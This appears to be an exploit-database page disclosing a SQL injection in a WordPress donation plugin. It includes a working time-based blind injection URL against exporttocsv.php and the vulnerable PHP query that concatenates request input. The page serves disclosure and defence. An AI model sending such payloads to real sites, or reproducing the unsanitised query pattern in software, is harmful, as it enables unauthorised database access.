header-logo
Suggest Exploit
vendor:
WordPress Donation Plugin with Goals and Paypal IPN by NonprofitCMS.org
by:
Miroslav Stampar
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: WordPress Donation Plugin with Goals and Paypal IPN by NonprofitCMS.org
Affected Version From: 1
Affected Version To: 1
Patch Exists: YES
Related CWE: N/A
CPE: a:wordpress:wordpress_donation_plugin_with_goals_and_paypal_ipn_by_nonprofitcmsorg
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2011

WordPress Donation plugin <= 1.0 SQL Injection Vulnerability

WordPress Donation plugin version 1.0 is vulnerable to a SQL injection vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the exporttocsv.php script with a malicious did parameter. This will allow the attacker to execute arbitrary SQL commands on the underlying database.

Mitigation:

Upgrade to the latest version of the WordPress Donation plugin.
Source

Exploit-DB raw data:

# Exploit Title: WordPress Donation plugin <= 1.0 SQL Injection Vulnerability
# Date: 2011-08-31
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/wordpress-donation-plugin-with-goals-and-paypal-ipn-by-nonprofitcmsorg.zip
# Version: 1.0 (tested)
# Note: WordPress Donation Plugin with Goals and Paypal IPN by NonprofitCMS.org (full name)

---
PoC
---
http://www.site.com/wp-content/plugins/wordpress-donation-plugin-with-goals-and-paypal-ipn-by-nonprofitcmsorg/exporttocsv.php?did=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20

---------------
Vulnerable code
---------------
$dId = $_REQUEST["did"];
...
$campaigns = $wpdb->get_results("SELECT * FROM $table_name WHERE camp_id=$dId");